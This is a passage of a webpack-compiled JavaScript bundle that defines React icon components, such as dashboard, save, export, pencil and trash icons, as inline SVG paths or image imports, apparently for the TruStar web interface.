Z M347.469,35.479 L343.316,34.575 L344.569,32.606 C344.692,32.412 344.664,32.159 344.502,31.997 C344.338,31.834 344.087,31.808 343.893,31.93 L341.923,33.184 L341.021,29.029 C344.3,29.572 346.927,32.198 347.469,35.479 Z M351.114,36.271 L348.483,35.699 C348.004,31.645 344.854,28.495 340.8,28.016 L340.228,25.385 C340.179,25.16 339.98,25 339.75,25 C339.519,25 339.32,25.16 339.271,25.385 L338.699,28.016 C334.645,28.495 331.495,31.645 331.016,35.699 L328.385,36.271 C328.16,36.32 328,36.519 328,36.749 C328,36.98 328.16,37.179 328.385,37.228 L331.016,37.8 C331.496,41.855 334.645,45.004 338.699,45.483 L339.271,48.114 C339.32,48.339 339.519,48.499 339.75,48.499 C339.98,48.499 340.179,48.339 340.228,48.114 L340.8,45.483 C344.854,45.004 348.004,41.855 348.483,37.8 L351.114,37.228 C351.339,37.179 351.5,36.98 351.5,36.749 C351.5,36.519 351.339,36.32 351.114,36.271 Z',
        fill: color
      })
    )
  );
};


var DashboardIcon = function DashboardIcon(_ref2) {
  var _ref2$color = _ref2.color,
      color = _ref2$color === undefined ? '#FFFFFF' : _ref2$color,
      props = _objectWithoutProperties(_ref2, ['color']);

  return __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
    'svg',
    _extends({
      width: '26px',
      height: '13px',
      viewBox: '0 0 26 13',
      version: '1.1',
      xmlns: 'http://www.w3.org/2000/svg',
      xmlnsXlink: 'http://www.w3.org/1999/xlink'
    }, props),
    __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
      'g',
      {
        stroke: 'none',
        strokeWidth: '1',
        fill: 'none',
        fillRule: 'evenodd',
        transform: 'translate(-185.000000, -30.000000)' },
      __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
        'g',
        {
          transform: 'translate(185.000000, 29.131900)',
          fill: color },
        __WEBPACK_IMPORTED_MODULE_0_react__["createElement"]('path', { d: 'M22.8817,5.181 C22.0027,5.181 21.2877,4.465 21.2877,3.586 C21.2877,2.707 22.0027,1.992 22.8817,1.992 C23.7607,1.992 24.4767,2.706 24.4767,3.586 C24.4767,4.465 23.7607,5.181 22.8817,5.181 M16.1867,11.876 C15.3067,11.876 14.5917,11.161 14.5917,10.282 C14.5917,9.403 15.3067,8.687 16.1867,8.687 C17.0657,8.687 17.7807,9.403 17.7807,10.282 C17.7807,11.161 17.0657,11.876 16.1867,11.876 M7.8187,3.586 C7.8187,2.707 8.5347,1.992 9.4137,1.992 C10.2937,1.992 11.0087,2.706 11.0087,3.586 C11.0087,4.465 10.2937,5.181 9.4137,5.181 C8.5347,5.181 7.8187,4.465 7.8187,3.586 M2.7177,11.876 C1.8387,11.876 1.1237,11.161 1.1237,10.282 C1.1237,9.403 1.8387,8.687 2.7177,8.687 C3.5977,8.687 4.3127,9.403 4.3127,10.282 C4.3127,11.161 3.5977,11.876 2.7177,11.876 M22.8817,0.869 C21.3827,0.869 20.1637,2.087 20.1637,3.586 C20.1637,4.133 20.3267,4.642 20.6057,5.069 L17.6687,8.005 C17.2417,7.727 16.7327,7.564 16.1867,7.564 C15.6197,7.564 15.0927,7.738 14.6577,8.035 L11.6907,5.069 C11.9687,4.642 12.1317,4.133 12.1317,3.586 C12.1317,2.087 10.9127,0.869 9.4137,0.869 C7.9147,0.869 6.6957,2.087 6.6957,3.586 C6.6957,4.133 6.8587,4.642 7.1367,5.069 L4.1997,8.005 C3.7737,7.726 3.2647,7.564 2.7177,7.564 C1.2197,7.564 -0.0003,8.783 -0.0003,10.282 C-0.0003,11.781 1.2197,13 2.7177,13 C4.2167,13 5.4367,11.781 5.4367,10.282 C5.4367,9.735 5.2737,9.226 4.9947,8.799 L7.9317,5.863 C8.3587,6.142 8.8667,6.304 9.4137,6.304 C9.9607,6.304 10.4697,6.142 10.8967,5.863 L13.8797,8.846 C13.6187,9.263 13.4677,9.755 13.4677,10.282 C13.4677,11.781 14.6877,13 16.1867,13 C17.6847,13 18.9047,11.781 18.9047,10.282 C18.9047,9.735 18.7417,9.226 18.4637,8.799 L21.3997,5.863 C21.8267,6.142 22.3357,6.304 22.8817,6.304 C24.3807,6.304 25.5997,5.085 25.5997,3.586 C25.5997,2.087 24.3807,0.869 22.8817,0.869' })
      )
    )
  );
};

// export const TrustarIcon = ({color = '#FFFFFF', ...props}: IconProps) => (
//   <img
//     src={color === 'white' ? logoSrc : logoSrcBlue}
//     alt='trustar logo' />
// );

var TrustarAdminIcon = function TrustarAdminIcon(_ref3) {
  var _ref3$color = _ref3.color,
      color = _ref3$color === undefined ? '#FFFFFF' : _ref3$color,
      props = _objectWithoutProperties(_ref3, ['color']);

  return __WEBPACK_IMPORTED_MODULE_0_react__["createElement"]('img', {
    style: { width: '10rem' },
    src: __WEBPACK_IMPORTED_MODULE_13__admean_png___default.a,
    alt: 'admin mode' });
};


var SaveIcon = function SaveIcon(_ref4) {
  var _ref4$color = _ref4.color,
      color = _ref4$color === undefined ? '#FFFFFF' : _ref4$color,
      props = _objectWithoutProperties(_ref4, ['color']);

  return __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
    'svg',
    _extends({
      width: '19px',
      height: '19px',
      viewBox: '0 0 19 19',
      version: '1.1',
      xmlns: 'http://www.w3.org/2000/svg',
      xmlnsXlink: 'http://www.w3.org/1999/xlink'
    }, props),
    __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
      'g',
      {
        stroke: 'none',
        strokeWidth: '1',
        fill: 'none',
        fillRule: 'evenodd',
        transform: 'translate(-1144.000000, -86.000000)' },
      __WEBPACK_IMPORTED_MODULE_0_react__["createElement"]('path', {
        d: 'M1161.235,102.698 C1161.235,102.994 1160.994,103.235 1160.699,103.235 L1159.089,103.235 L1159.089,96.262 C1159.089,95.375 1158.368,94.653 1157.481,94.653 L1148.827,94.653 C1147.94,94.653 1147.218,95.375 1147.218,96.262 L1147.218,103.235 L1145.609,103.235 C1145.313,103.235 1145.072,102.994 1145.072,102.698 L1145.072,87.609 C1145.072,87.313 1145.313,87.072 1145.609,87.072 L1148.291,87.072 L1148.291,90.827 C1148.291,91.715 1149.013,92.436 1149.9,92.436 L1156.408,92.436 C1157.295,92.436 1158.017,91.715 1158.017,90.827 L1158.017,87.072 L1158.109,87.072 C1158.252,87.072 1158.387,87.128 1158.488,87.229 L1161.078,89.819 C1161.179,89.921 1161.235,90.055 1161.235,90.199 L1161.235,102.698 Z M1158.017,96.799 L1148.291,96.799 L1148.291,96.262 C1148.291,95.967 1148.531,95.725 1148.827,95.725 L1157.481,95.725 C1157.776,95.725 1158.017,95.967 1158.017,96.262 L1158.017,96.799 Z M1148.291,103.235 L1158.017,103.235 L1158.017,97.871 L1148.291,97.871 L1148.291,103.235 Z M1149.363,87.072 L1154.798,87.072 L1154.798,89.755 C1154.798,90.051 1155.039,90.291 1155.335,90.291 C1155.631,90.291 1155.871,90.051 1155.871,89.755 L1155.871,87.072 L1156.944,87.072 L1156.944,90.827 C1156.944,91.123 1156.703,91.363 1156.408,91.363 L1149.9,91.363 C1149.604,91.363 1149.363,91.123 1149.363,90.827 L1149.363,87.072 Z M1161.837,89.06 L1159.247,86.47 C1158.943,86.167 1158.539,86 1158.109,86 L1148.827,86 L1145.609,86 C1144.722,86 1144,86.721 1144,87.609 L1144,102.698 C1144,103.586 1144.722,104.307 1145.609,104.307 L1160.699,104.307 C1161.586,104.307 1162.308,103.586 1162.308,102.698 L1162.308,90.199 C1162.308,89.768 1162.14,89.365 1161.837,89.06 Z',
        fill: color
      })
    )
  );
};


var ExportIcon = function ExportIcon(_ref5) {
  var _ref5$color = _ref5.color,
      color = _ref5$color === undefined ? '#FFFFFF' : _ref5$color,
      props = _objectWithoutProperties(_ref5, ['color']);

  return __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
    'svg',
    _extends({
      className: cx('icon'),
      width: '17px',
      height: '20px',
      viewBox: '0 0 17 20',
      version: '1.1',
      xmlns: 'http://www.w3.org/2000/svg',
      xmlnsXlink: 'http://www.w3.org/1999/xlink'
    }, props),
    __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
      'g',
      {
        stroke: 'none',
        strokeWidth: '1',
        fill: 'none',
        fillRule: 'evenodd',
        transform: 'translate(-1221.000000, -87.000000)' },
      __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
        'g',
        { transform: 'translate(1222.000000, 87.000000)' },
        __WEBPACK_IMPORTED_MODULE_0_react__["createElement"]('path', { d: 'M14.2556,19.3705 L1.7326,19.3705 C0.9426,19.3705 0.2996,18.7285 0.2996,17.9385 L0.2996,1.7315 C0.2996,0.9415 0.9426,0.3005 1.7326,0.3005 L10.8266,0.3005 C10.9846,0.3005 11.1126,0.4285 11.1126,0.5865 C11.1126,0.7445 10.9846,0.8725 10.8266,0.8725 L1.7326,0.8725 C1.2586,0.8725 0.8726,1.2585 0.8726,1.7315 L0.8726,17.9385 C0.8726,18.4125 1.2586,18.7985 1.7326,18.7985 L14.2556,18.7985 C14.7296,18.7985 15.1146,18.4125 15.1146,17.9385 L15.1146,5.2855 C15.1146,5.1275 15.2426,4.9995 15.4016,4.9995 C15.5596,4.9995 15.6876,5.1275 15.6876,5.2855 L15.6876,17.9385 C15.6876,18.7285 15.0456,19.3705 14.2556,19.3705' }),
        __WEBPACK_IMPORTED_MODULE_0_react__["createElement"]('path', {
          d: 'M14.2556,19.3705 L1.7326,19.3705 C0.9426,19.3705 0.2996,18.7285 0.2996,17.9385 L0.2996,1.7315 C0.2996,0.9415 0.9426,0.3005 1.7326,0.3005 L10.8266,0.3005 C10.9846,0.3005 11.1126,0.4285 11.1126,0.5865 C11.1126,0.7445 10.9846,0.8725 10.8266,0.8725 L1.7326,0.8725 C1.2586,0.8725 0.8726,1.2585 0.8726,1.7315 L0.8726,17.9385 C0.8726,18.4125 1.2586,18.7985 1.7326,18.7985 L14.2556,18.7985 C14.7296,18.7985 15.1146,18.4125 15.1146,17.9385 L15.1146,5.2855 C15.1146,5.1275 15.2426,4.9995 15.4016,4.9995 C15.5596,4.9995 15.6876,5.1275 15.6876,5.2855 L15.6876,17.9385 C15.6876,18.7285 15.0456,19.3705 14.2556,19.3705 Z',
          stroke: color,
          strokeWidth: '0.6'
        }),
        __WEBPACK_IMPORTED_MODULE_0_react__["createElement"]('path', { d: 'M15.4011,5.5726 L10.8271,5.5726 C10.6691,5.5726 10.5401,5.4436 10.5401,5.2856 L10.5401,0.7106 C10.5401,0.5516 10.6691,0.4246 10.8271,0.4246 C10.9841,0.4246 11.1131,0.5516 11.1131,0.7106 L11.1131,4.9986 L15.4011,4.9986 C15.5591,4.9986 15.6881,5.1276 15.6881,5.2856 C15.6881,5.4436 15.5601,5.5726 15.4011,5.5726' }),
        __WEBPACK_IMPORTED_MODULE_0_react__["createElement"]('path', {
          d: 'M15.4011,5.5726 L10.8271,5.5726 C10.6691,5.5726 10.5401,5.4436 10.5401,5.2856 L10.5401,0.7106 C10.5401,0.5516 10.6691,0.4246 10.8271,0.4246 C10.9841,0.4246 11.1131,0.5516 11.1131,0.7106 L11.1131,4.9986 L15.4011,4.9986 C15.5591,4.9986 15.6881,5.1276 15.6881,5.2856 C15.6881,5.4436 15.5601,5.5726 15.4011,5.5726 Z',
          stroke: color,
          strokeWidth: '0.6'
        }),
        __WEBPACK_IMPORTED_MODULE_0_react__["createElement"]('path', { d: 'M15.4011,5.5726 C15.3271,5.5726 15.2521,5.5436 15.1961,5.4856 L10.6221,0.7866 C10.5111,0.6746 10.5141,0.4916 10.6271,0.3826 C10.7401,0.2706 10.9221,0.2736 11.0321,0.3876 L15.6071,5.0866 C15.7161,5.1996 15.7141,5.3816 15.6011,5.4916 C15.5461,5.5456 15.4731,5.5726 15.4011,5.5726' }),
        __WEBPACK_IMPORTED_MODULE_0_react__["createElement"]('path', {
          d: 'M15.4011,5.5726 C15.3271,5.5726 15.2521,5.5436 15.1961,5.4856 L10.6221,0.7866 C10.5111,0.6746 10.5141,0.4916 10.6271,0.3826 C10.7401,0.2706 10.9221,0.2736 11.0321,0.3876 L15.6071,5.0866 C15.7161,5.1996 15.7141,5.3816 15.6011,5.4916 C15.5461,5.5456 15.4731,5.5726 15.4011,5.5726 Z',
          stroke: color,
          strokeWidth: '0.6'
        }),
        __WEBPACK_IMPORTED_MODULE_0_react__["createElement"]('polyline', {
          stroke: color,
          strokeWidth: '1.3',
          strokeLinecap: 'round',
          strokeLinejoin: 'round',
          points: '3.6062 11.3178 7.9942 15.7058 12.3812 11.3178'
        }),
        __WEBPACK_IMPORTED_MODULE_0_react__["createElement"]('path', {
          d: 'M7.9939,8.8529 L7.9939,15.1679',
          stroke: color,
          strokeWidth: '1.3',
          strokeLinecap: 'round',
          strokeLinejoin: 'round'
        })
      )
    )
  );
};


var RefreshIcon = function RefreshIcon() {
  return __WEBPACK_IMPORTED_MODULE_0_react__["createElement"]('img', {
    className: cx('icon'), src: __WEBPACK_IMPORTED_MODULE_2_trustar_img_reload_svg___default.a,
    alt: 'Refresh Icon' });
};

var NextIcon = function NextIcon() {
  return __WEBPACK_IMPORTED_MODULE_0_react__["createElement"]('img', {
    className: cx('icon'), src: __WEBPACK_IMPORTED_MODULE_3_trustar_img_next_svg___default.a,
    alt: 'Next Icon' });
};

var PrevIcon = function PrevIcon() {
  return __WEBPACK_IMPORTED_MODULE_0_react__["createElement"]('img', {
    className: cx('icon'), src: __WEBPACK_IMPORTED_MODULE_4_trustar_img_prev_svg___default.a,
    alt: 'Prev Icon' });
};

var SearchIcon = function SearchIcon() {
  return __WEBPACK_IMPORTED_MODULE_0_react__["createElement"]('img', {
    className: cx('icon'), src: __WEBPACK_IMPORTED_MODULE_6_trustar_img_magnifier_svg___default.a,
    alt: 'Search Icon' });
};

var FilterIcon = function FilterIcon() {
  return __WEBPACK_IMPORTED_MODULE_0_react__["createElement"]('img', {
    className: cx('icon'), src: __WEBPACK_IMPORTED_MODULE_5_trustar_img_funnel_svg___default.a,
    alt: 'Filter Icon' });
};

var CalendarIcon = function CalendarIcon() {
  return __WEBPACK_IMPORTED_MODULE_0_react__["createElement"]('img', {
    className: cx('icon'), src: __WEBPACK_IMPORTED_MODULE_7_trustar_img_calendar_full_svg___default.a,
    alt: 'Calendar Icon' });
};

var FloppyIcon = function FloppyIcon() {
  return __WEBPACK_IMPORTED_MODULE_0_react__["createElement"]('img', {
    className: cx('icon'), src: __WEBPACK_IMPORTED_MODULE_9_trustar_img_floppy_disk_svg___default.a,
    alt: 'Floppy Icon' });
};

var DownloadIcon = function DownloadIcon() {
  return __WEBPACK_IMPORTED_MODULE_0_react__["createElement"]('img', {
    className: cx('icon'), src: __WEBPACK_IMPORTED_MODULE_8_trustar_img_download_svg___default.a,
    alt: 'Download Icon' });
};

var CogIcon = function CogIcon() {
  return __WEBPACK_IMPORTED_MODULE_0_react__["createElement"]('img', {
    className: cx('icon'), src: __WEBPACK_IMPORTED_MODULE_10_trustar_img_cog_svg___default.a,
    alt: 'Cog Icon' });
};

var RedoIcon = function RedoIcon() {
  return __WEBPACK_IMPORTED_MODULE_0_react__["createElement"]('img', {
    className: cx('icon'), src: __WEBPACK_IMPORTED_MODULE_11_trustar_img_redo_svg___default.a,
    alt: 'Redo Icon' });
};

var UndoIcon = function UndoIcon() {
  return __WEBPACK_IMPORTED_MODULE_0_react__["createElement"]('img', {
    className: cx('icon'), src: __WEBPACK_IMPORTED_MODULE_12_trustar_img_undo_svg___default.a,
    alt: 'Undo Icon' });
};

var InboxDownloadIcon = function InboxDownloadIcon() {
  return __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
    'svg',
    {
      width: '20px',
      height: '19px',
      viewBox: '0 0 20 19',
      version: '1.1',
      xmlns: 'http://www.w3.org/2000/svg',
      xmlnsXlink: 'http://www.w3.org/1999/xlink' },
    __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
      'desc',
      null,
      'Created with Sketch.'
    ),
    __WEBPACK_IMPORTED_MODULE_0_react__["createElement"]('defs', null),
    __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
      'g',
      {
        id: 'Page-1',
        stroke: 'none',
        strokeWidth: '1',
        fill: 'none',
        fillRule: 'evenodd' },
      __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
        'g',
        {
          id: 'Add-More-Enclaves-Filter',
          transform: 'translate(-257.000000, -104.000000)' },
        __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
          'g',
          {
            id: 'Group',
            transform: 'translate(257.000000, 104.000000)' },
          __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
            'g',
            {
              id: 'if_icon-92-inbox-download_314776',
              transform: 'translate(0.000000, 4.800000)',
              fill: '#44546A',
              fillRule: 'nonzero' },
            __WEBPACK_IMPORTED_MODULE_0_react__["createElement"]('path', {
              d: 'M13.6,6.4 L19.0200195,6.4 L15.5200195,0.8 L11.2,0.8 L11.2,0 L16,0 L20,6.4 L20,7.2 L20,13.6 L0,13.6 L0,6.4 L4,0 L8.8,0 L8.8,0.8 L4.47998047,0.8 L0.979980472,6.4 L6.4,6.4 L6.4,8 C6.4,8.8836556 7.11668624,9.6 7.99791336,9.6 L12.0020866,9.6 C12.8845898,9.6 13.6,8.88981632 13.6,8 L13.6,6.4 Z',
              id: 'inbox-download' })
          ),
          __WEBPACK_IMPORTED_MODULE_0_react__["createElement"]('rect', {
            id: 'Rectangle-3',
            fill: '#FFFFFF',
            x: '5.6',
            y: '4.8',
            width: '8.8',
            height: '1' }),
          __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
            'g',
            {
              id: 'cog',
              transform: 'translate(6.400000, 0.000000)',
              fill: '#44546A',
              fillRule: 'nonzero' },
            __WEBPACK_IMPORTED_MODULE_0_react__["createElement"]('path', {
              d: 'M3.0524,7.8808 C3.036,7.8808 3.0192,7.8788 3.0024,7.8744 C2.6432,7.782 2.298,7.6396 1.9768,7.4508 C1.8836,7.396 1.8508,7.2772 1.9024,7.1824 C1.966,7.0656 1.9996,6.9336 1.9996,6.7996 C1.9996,6.3584 1.6408,5.9996 1.1996,5.9996 C1.066,5.9996 0.9336,6.0332 0.8168,6.0968 C0.722,6.1484 0.6032,6.1156 0.5484,6.0224 C0.3596,5.7008 0.2172,5.356 0.1248,4.9968 C0.0988,4.8952 0.1556,4.7908 0.2548,4.7576 C0.5804,4.648 0.7996,4.3432 0.7996,3.9996 C0.7996,3.656 0.5808,3.3512 0.2548,3.2416 C0.1556,3.208 0.0988,3.104 0.1248,3.0024 C0.2172,2.6432 0.3596,2.298 0.5484,1.9768 C0.6032,1.8836 0.722,1.8508 0.8168,1.9024 C0.9332,1.966 1.0656,1.9996 1.1996,1.9996 C1.6408,1.9996 1.9996,1.6408 1.9996,1.1996 C1.9996,1.066 1.966,0.9336 1.9024,0.8168 C1.8508,0.722 1.8836,0.6032 1.9768,0.5484 C2.2984,0.3596 2.6432,0.2172 3.0024,0.1248 C3.104,0.0988 3.2084,0.1556 3.2416,0.2548 C3.3512,0.5804 3.656,0.7996 3.9996,0.7996 C4.3432,0.7996 4.648,0.5808 4.7576,0.2548 C4.7912,0.1556 4.8956,0.0988 4.9968,0.1248 C5.356,0.2172 5.7012,0.3596 6.0224,0.5484 C6.1156,0.6032 6.1484,0.722 6.0968,0.8168 C6.0332,0.9336 5.9996,1.0656 5.9996,1.1996 C5.9996,1.6408 6.3584,1.9996 6.7996,1.9996 C6.9332,1.9996 7.0656,1.966 7.1824,1.9024 C7.2772,1.8508 7.396,1.8836 7.4508,1.9768 C7.6396,2.2984 7.782,2.6432 7.8744,3.0024 C7.9004,3.104 7.8436,3.2084 7.7444,3.2416 C7.4188,3.3512 7.1996,3.656 7.1996,3.9996 C7.1996,4.3432 7.4184,4.648 7.7444,4.7576 C7.8436,4.7912 7.9004,4.8952 7.8744,4.9968 C7.782,5.356 7.6396,5.7012 7.4508,6.0224 C7.396,6.1156 7.2772,6.1484 7.1824,6.0968 C7.0656,6.0332 6.9336,5.9996 6.7996,5.9996 C6.3584,5.9996 5.9996,6.3584 5.9996,6.7996 C5.9996,6.9332 6.0332,7.0656 6.0968,7.1824 C6.1484,7.2772 6.1156,7.396 6.0224,7.4508 C5.7008,7.6396 5.356,7.782 4.9968,7.8744 C4.8952,7.9004 4.7908,7.8436 4.7576,7.7444 C4.648,7.4188 4.3432,7.1996 3.9996,7.1996 C3.656,7.1996 3.3512,7.4184 3.2416,7.7444 C3.2136,7.8272 3.136,7.8808 3.052,7.8808 L3.0524,7.8808 Z M4,6.8 C4.4508,6.8 4.8568,7.0512 5.062,7.4408 C5.27,7.3764 5.4724,7.2932 5.666,7.192 C5.6228,7.0664 5.6004,6.9336 5.6004,6.8 C5.6004,6.1384 6.1388,5.6 6.8004,5.6 C6.934,5.6 7.0668,5.6224 7.1924,5.6656 C7.2936,5.472 7.3772,5.27 7.4412,5.0616 C7.0516,4.8568 6.8004,4.4508 6.8004,3.9996 C6.8004,3.5484 7.0516,3.1428 7.4412,2.9376 C7.3768,2.7296 7.2936,2.5272 7.1924,2.3336 C7.0668,2.3768 6.934,2.3992 6.8004,2.3992 C6.1388,2.3992 5.6004,1.8608 5.6004,1.1992 C5.6004,1.0656 5.6228,0.9328 5.666,0.8072 C5.4724,0.706 5.2704,0.6224 5.062,0.5584 C4.8572,0.948 4.4512,1.1992 4,1.1992 C3.5488,1.1992 3.1432,0.948 2.938,0.5584 C2.73,0.6224 2.5276,0.706 2.334,0.8072 C2.3772,0.9328 2.3996,1.0656 2.3996,1.1992 C2.3996,1.8608 1.8612,2.3992 1.1996,2.3992 C1.066,2.3992 0.9332,2.3768 0.8076,2.3336 C0.7064,2.5272 0.6228,2.7292 0.5588,2.9376 C0.9484,3.1424 1.1996,3.5484 1.1996,3.9996 C1.1996,4.4508 0.9484,4.8564 0.5588,5.0616 C0.6228,5.2696 0.7064,5.472 0.8076,5.6656 C0.9332,5.6224 1.066,5.6 1.1996,5.6 C1.8612,5.6 2.3996,6.1384 2.3996,6.8 C2.3996,6.9336 2.3772,7.0664 2.334,7.192 C2.5276,7.2932 2.7296,7.3768 2.938,7.4408 C3.1428,7.0512 3.5488,6.8 4,6.8 Z',
              id: 'Shape' }),
            __WEBPACK_IMPORTED_MODULE_0_react__["createElement"]('path', {
              d: 'M4,5.2 C3.3384,5.2 2.8,4.6616 2.8,4 C2.8,3.3384 3.3384,2.8 4,2.8 C4.6616,2.8 5.2,3.3384 5.2,4 C5.2,4.6616 4.6616,5.2 4,5.2 Z M4,3.2 C3.5588,3.2 3.2,3.5588 3.2,4 C3.2,4.4412 3.5588,4.8 4,4.8 C4.4412,4.8 4.8,4.4412 4.8,4 C4.8,3.5588 4.4412,3.2 4,3.2 Z',
              id: 'Shape' })
          )
        )
      )
    )
  );
};

var CheckMark = function CheckMark(_ref6) {
  var className = _ref6.className,
      props = _objectWithoutProperties(_ref6, ['className']);

  return __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
    'svg',
    _extends({
      width: '14px',
      height: '10px',
      viewBox: '0 0 14 10',
      version: '1.1',
      xmlns: 'http://www.w3.org/2000/svg',
      xmlnsXlink: 'http://www.w3.org/1999/xlink',
      className: cx('CheckMark', className)
    }, props),
    __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
      'g',
      {
        stroke: 'none',
        strokeWidth: '1',
        fill: 'none',
        fillRule: 'evenodd',
        transform: 'translate(-422.000000, -213.000000)' },
      __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
        'g',
        { transform: 'translate(422.000000, 213.000000)' },
        __WEBPACK_IMPORTED_MODULE_0_react__["createElement"]('path', { d: 'M13.1455,0.19503 C12.8845,-0.06497 12.4625,-0.06497 12.2025,0.19503 L4.2105,8.18703 L1.1385,5.11503 C0.8785,4.85403 0.4565,4.85403 0.1955,5.11503 C-0.0645,5.37603 -0.0645,5.79803 0.1955,6.05803 L3.7385,9.60203 C3.9995,9.86203 4.4215,9.86203 4.6825,9.60203 L13.1455,1.13803 C13.4055,0.87903 13.4055,0.45603 13.1455,0.19503' })
      )
    )
  );
};


var PencilIcon = function PencilIcon(_ref7) {
  var className = _ref7.className,
      props = _objectWithoutProperties(_ref7, ['className']);

  return __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
    'svg',
    _extends({
      width: '20px',
      height: '20px',
      viewBox: '0 0 20 20',
      version: '1.1',
      xmlns: 'http://www.w3.org/2000/svg',
      xmlnsXlink: 'http://www.w3.org/1999/xlink',
      className: className
    }, props),
    __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
      'defs',
      null,
      __WEBPACK_IMPORTED_MODULE_0_react__["createElement"]('path', {
        d: 'M21.104,2.89599995 C20.542,2.33399995 19.795,2.02499995 19,2.02499995 C18.205,2.02499995 17.458,2.33399995 16.896,2.89599995 L4.14599996,15.646 C4.09399996,15.698 4.05499996,15.76 4.02999996,15.829 L2.02999995,21.329 C1.96399995,21.512 2.00899995,21.716 2.14599995,21.853 C2.24099995,21.948 2.36899995,21.999 2.49999995,21.999 C2.55699995,21.999 2.61499995,21.989 2.67099995,21.969 L8.17099998,19.969 C8.23999998,19.944 8.30199998,19.904 8.35399998,19.853 L21.104,7.10299998 C21.666,6.54099997 21.975,5.79399997 21.975,4.99899996 C21.975,4.20399996 21.666,3.45699996 21.104,2.89499995 L21.104,2.89599995 Z M7.72499998,19.068 L3.33599996,20.664 L4.93199996,16.275 L16,5.20699997 L18.793,7.99999998 L7.72499998,19.068 Z M20.396,6.39599997 L19.5,7.29199998 L16.707,4.49899996 L17.603,3.60299996 C17.976,3.22999996 18.472,3.02499996 18.999,3.02499996 C19.526,3.02499996 20.022,3.22999996 20.395,3.60299996 C20.768,3.97599996 20.973,4.47199996 20.973,4.99899996 C20.973,5.52599997 20.768,6.02199997 20.395,6.39499997 L20.396,6.39599997 Z',
        id: 'path-1' })
    ),
    __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
      'g',
      {
        id: 'Symbols',
        stroke: 'none',
        strokeWidth: '1',
        fill: 'none',
        fillRule: 'evenodd' },
      __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
        'g',
        {
          id: '0014-pencil',
          transform: 'translate(-2.000000, -2.000000)' },
        __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
          'mask',
          {
            id: 'mask-2',
            fill: 'white' },
          __WEBPACK_IMPORTED_MODULE_0_react__["createElement"]('use', { xlinkHref: '#path-1' })
        ),
        __WEBPACK_IMPORTED_MODULE_0_react__["createElement"]('use', {
          fill: '#000000',
          fillRule: 'nonzero',
          xlinkHref: '#path-1' })
      )
    )
  );
};


var TrashIcon = function TrashIcon(_ref8) {
  var className = _ref8.className,
      props = _objectWithoutProperties(_ref8, ['className']);

  return __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
    'svg',
    _extends({
      width: '20px',
      height: '20px',
      viewBox: '0 0 15 20',
      version: '1.1',
      xmlns: 'http://www.w3.org/2000/svg',
      xmlnsXlink: 'http://www.w3.org/1999/xlink',
      className: className
    }, props),
    __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
      'title',
      null,
      'trash2'
    ),
    __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
      'defs',
      null,
      __WEBPACK_IMPORTED_MODULE_0_react__["createElement"]('path', {
        d: 'M17.5,3.99999996 L14,3.99999996 L14,3.49999996 C14,2.67299995 13.327,1.99999995 12.5,1.99999995 L10.5,1.99999995 C9.67299999,1.99999995 8.99999998,2.67299995 8.99999998,3.49999996 L8.99999998,3.99999996 L5.49999997,3.99999996 C4.67299996,3.99999996 3.99999996,4.67299996 3.99999996,5.49999997 L3.99999996,6.49999997 C3.99999996,7.15199998 4.41799996,7.70799998 4.99999996,7.91399998 L4.99999996,20.5 C4.99999996,21.327 5.67299997,22.0000001 6.49999997,22.0000001 L16.5,22.0000001 C17.327,22.0000001 18,21.327 18,20.5 L18,7.91399998 C18.582,7.70799998 19,7.15199998 19,6.49999997 L19,5.49999997 C19,4.67299996 18.327,3.99999996 17.5,3.99999996 Z M9.99999999,3.49999996 C9.99999999,3.22399996 10.224,2.99999995 10.5,2.99999995 L12.5,2.99999995 C12.776,2.99999995 13,3.22399996 13,3.49999996 L13,3.99999996 L9.99999999,3.99999996 L9.99999999,3.49999996 Z M16.5,21 L6.49999997,21 C6.22399997,21 5.99999997,20.776 5.99999997,20.5 L5.99999997,7.99999998 L17,7.99999998 L17,20.5 C17,20.776 16.776,21 16.5,21 Z M18,6.49999997 C18,6.77599997 17.776,6.99999997 17.5,6.99999997 L5.49999997,6.99999997 C5.22399997,6.99999997 4.99999996,6.77599997 4.99999996,6.49999997 L4.99999996,5.49999997 C4.99999996,5.22399997 5.22399997,4.99999996 5.49999997,4.99999996 L17.5,4.99999996 C17.776,4.99999996 18,5.22399997 18,5.49999997 L18,6.49999997 Z M14.5,8.99999999 C14.224,8.99999999 14,9.22399999 14,9.49999999 L14,19.5 C14,19.776 14.224,20 14.5,20 C14.776,20 15,19.776 15,19.5 L15,9.49999999 C15,9.22399999 14.776,8.99999999 14.5,8.99999999 Z M11.5,8.99999999 C11.224,8.99999999 11,9.22399999 11,9.49999999 L11,19.5 C11,19.776 11.224,20 11.5,20 C11.776,20 12,19.776 12,19.5 L12,9.49999999 C12,9.22399999 11.776,8.99999999 11.5,8.99999999 Z M8.49999998,8.99999999 C8.22399998,8.99999999 7.99999998,9.22399999 7.99999998,9.49999999 L7.99999998,19.5 C7.99999998,19.776 8.22399998,20 8.49999998,20 C8.77599998,20 8.99999998,19.776 8.99999998,19.5 L8.99999998,9.49999999 C8.99999998,9.22399999 8.77599998,8.99999999 8.49999998,8.99999999 Z',
        id: 'path-2' })
    ),
    __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
      'g',
      {
